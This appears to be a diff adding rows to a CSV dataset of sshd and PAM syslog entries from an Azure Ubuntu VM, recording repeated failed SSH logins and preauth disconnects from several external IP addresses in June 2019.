+4111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:10,UbuntuDevEnv,2019-06-26 13:50:09,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 14025 [preauth],130626,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,14025,,
+4112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:12,UbuntuDevEnv,2019-06-26 13:50:11,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 26682 [preauth],130633,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,26682,,
+4113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:14,UbuntuDevEnv,2019-06-26 13:50:14,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 37965 [preauth],130645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,37965,,
+4114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:16,UbuntuDevEnv,2019-06-26 13:50:15,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 40638 [preauth],130652,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,40638,,
+4115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:16,UbuntuDevEnv,2019-06-26 13:50:16,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 37356 [preauth],130646,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,37356,,
+4116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:17,UbuntuDevEnv,2019-06-26 13:50:16,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 44382 [preauth],130654,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,44382,,
+4117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:19,UbuntuDevEnv,2019-06-26 13:50:18,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 1276 [preauth],130665,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,1276,,
+4118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:21,UbuntuDevEnv,2019-06-26 13:50:20,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 21044 [preauth],130672,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,21044,,
+4119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:23,UbuntuDevEnv,2019-06-26 13:50:22,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 45508 [preauth],130683,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,45508,,
+4120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:23,UbuntuDevEnv,2019-06-26 13:50:23,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 22246 [preauth],130698,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,22246,,
+4121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:24,UbuntuDevEnv,2019-06-26 13:50:23,auth,UbuntuDevEnv,info,Connection closed by 5.196.23.14 port 47160 [preauth],130701,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.196.23.1,47160,,
+4122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:26,UbuntuDevEnv,2019-06-26 13:50:25,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 60702 [preauth],130707,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,60702,,
+4123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:27,UbuntuDevEnv,2019-06-26 13:50:27,auth,UbuntuDevEnv,info,Invalid user webs from 139.199.34.112 port 43058,130682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webs,139.199.34.1,43058,,
+4124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:27,UbuntuDevEnv,2019-06-26 13:50:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:27,UbuntuDevEnv,2019-06-26 13:50:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,130682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+4126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:28,UbuntuDevEnv,2019-06-26 13:50:27,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 15333 [preauth],130713,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,15333,,
+4127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:28,UbuntuDevEnv,2019-06-26 13:50:28,auth,UbuntuDevEnv,info,Failed password for invalid user webs from 139.199.34.112 port 43058 ssh2,130682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webs,139.199.34.1,43058,,
+4128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:29,UbuntuDevEnv,2019-06-26 13:50:28,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 43058:11: Bye Bye [preauth],130682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,43058,,
+4129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:29,UbuntuDevEnv,2019-06-26 13:50:28,auth,UbuntuDevEnv,info,Disconnected from invalid user webs 139.199.34.112 port 43058 [preauth],130682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webs,139.199.34.1,43058,,
+4130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:30,UbuntuDevEnv,2019-06-26 13:50:30,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 62332 [preauth],130725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,62332,,
+4131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:32,UbuntuDevEnv,2019-06-26 13:50:32,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 2565 [preauth],130731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,2565,,
+4132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:35,UbuntuDevEnv,2019-06-26 13:50:34,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 22349 [preauth],130741,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,22349,,
+4133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:37,UbuntuDevEnv,2019-06-26 13:50:37,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 29469 [preauth],130754,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,29469,,
+4134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:39,UbuntuDevEnv,2019-06-26 13:50:39,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 34852 [preauth],130769,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,34852,,
+4135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:42,UbuntuDevEnv,2019-06-26 13:50:41,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 28282 [preauth],130777,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,28282,,
+4136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:44,UbuntuDevEnv,2019-06-26 13:50:43,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 52600 [preauth],130787,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,52600,,
+4137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:46,UbuntuDevEnv,2019-06-26 13:50:46,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 34343 [preauth],130793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,34343,,
+4138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:48,UbuntuDevEnv,2019-06-26 13:50:48,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 51305 [preauth],130805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,51305,,
+4139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:51,UbuntuDevEnv,2019-06-26 13:50:50,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 59443 [preauth],130811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,59443,,
+4140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:53,UbuntuDevEnv,2019-06-26 13:50:52,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 52158 [preauth],130822,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,52158,,
+4141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:55,UbuntuDevEnv,2019-06-26 13:50:55,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 40560 [preauth],130834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,40560,,
+4142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:50:57,UbuntuDevEnv,2019-06-26 13:50:57,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 2023 [preauth],130840,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,2023,,
+4143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:00,UbuntuDevEnv,2019-06-26 13:50:59,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 40938 [preauth],130852,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,40938,,
+4144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:01,UbuntuDevEnv,2019-06-26 13:51:01,auth,UbuntuDevEnv,info,Invalid user rabbitmq from 196.46.36.144 port 32825,130850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rabbitmq,196.46.36.1,32825,,
+4145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:01,UbuntuDevEnv,2019-06-26 13:51:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,130850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:01,UbuntuDevEnv,2019-06-26 13:51:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:02,UbuntuDevEnv,2019-06-26 13:51:02,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 51363 [preauth],130862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,51363,,
+4148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:03,UbuntuDevEnv,2019-06-26 13:51:03,auth,UbuntuDevEnv,info,Failed password for invalid user rabbitmq from 196.46.36.144 port 32825 ssh2,130850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rabbitmq,196.46.36.1,32825,,
+4149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:03,UbuntuDevEnv,2019-06-26 13:51:03,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 32825:11: Bye Bye [preauth],130850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,32825,,
+4150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:03,UbuntuDevEnv,2019-06-26 13:51:03,auth,UbuntuDevEnv,info,Disconnected from invalid user rabbitmq 196.46.36.144 port 32825 [preauth],130850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rabbitmq,196.46.36.1,32825,,
+4151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:05,UbuntuDevEnv,2019-06-26 13:51:05,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 26781 [preauth],130875,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,26781,,
+4152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:07,UbuntuDevEnv,2019-06-26 13:51:06,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 3555 [preauth],130887,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,3555,,
+4153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:09,UbuntuDevEnv,2019-06-26 13:51:08,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 63301 [preauth],130902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,63301,,
+4154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:11,UbuntuDevEnv,2019-06-26 13:51:11,auth,UbuntuDevEnv,info,Connection closed by 119.81.131.85 port 16084 [preauth],130911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.81.131.8,16084,,
+4155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:31,UbuntuDevEnv,2019-06-26 13:51:31,auth,UbuntuDevEnv,info,Invalid user vicky from 157.230.115.27 port 36658,130977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vicky,157.230.115.2,36658,,
+4156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:31,UbuntuDevEnv,2019-06-26 13:51:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,130977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:31,UbuntuDevEnv,2019-06-26 13:51:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,130977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+4158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:33,UbuntuDevEnv,2019-06-26 13:51:33,auth,UbuntuDevEnv,info,Failed password for invalid user vicky from 157.230.115.27 port 36658 ssh2,130977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vicky,157.230.115.2,36658,,
+4159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:34,UbuntuDevEnv,2019-06-26 13:51:33,auth,UbuntuDevEnv,info,Disconnected from invalid user vicky 157.230.115.27 port 36658 [preauth],130977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vicky,157.230.115.2,36658,,
+4160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:51:34,UbuntuDevEnv,2019-06-26 13:51:33,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 36658:11: Bye Bye [preauth],130977,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,36658,,
+4161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:52:18,UbuntuDevEnv,2019-06-26 13:52:18,auth,UbuntuDevEnv,info,Invalid user dante from 201.48.54.81 port 49677,451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dante,201.48.54.8,49677,,
+4162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:52:18,UbuntuDevEnv,2019-06-26 13:52:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:52:18,UbuntuDevEnv,2019-06-26 13:52:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+4164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:52:20,UbuntuDevEnv,2019-06-26 13:52:20,auth,UbuntuDevEnv,info,Failed password for invalid user dante from 201.48.54.81 port 49677 ssh2,451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dante,201.48.54.8,49677,,
+4165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:52:21,UbuntuDevEnv,2019-06-26 13:52:20,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 49677:11: Bye Bye [preauth],451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,49677,,
+4166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:52:21,UbuntuDevEnv,2019-06-26 13:52:20,auth,UbuntuDevEnv,info,Disconnected from invalid user dante 201.48.54.81 port 49677 [preauth],451,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dante,201.48.54.8,49677,,
+4167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:12,UbuntuDevEnv,2019-06-26 13:53:12,auth,UbuntuDevEnv,info,Invalid user dpi from 157.230.115.27 port 54018,647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dpi,157.230.115.2,54018,,
+4168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:12,UbuntuDevEnv,2019-06-26 13:53:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+4169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:12,UbuntuDevEnv,2019-06-26 13:53:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:14,UbuntuDevEnv,2019-06-26 13:53:14,auth,UbuntuDevEnv,info,Failed password for invalid user dpi from 157.230.115.27 port 54018 ssh2,647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dpi,157.230.115.2,54018,,
+4171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:53:14,UbuntuDevEnv,2019-06-26 13:53:14,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 54018:11: Bye Bye [preauth],647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,54018,,
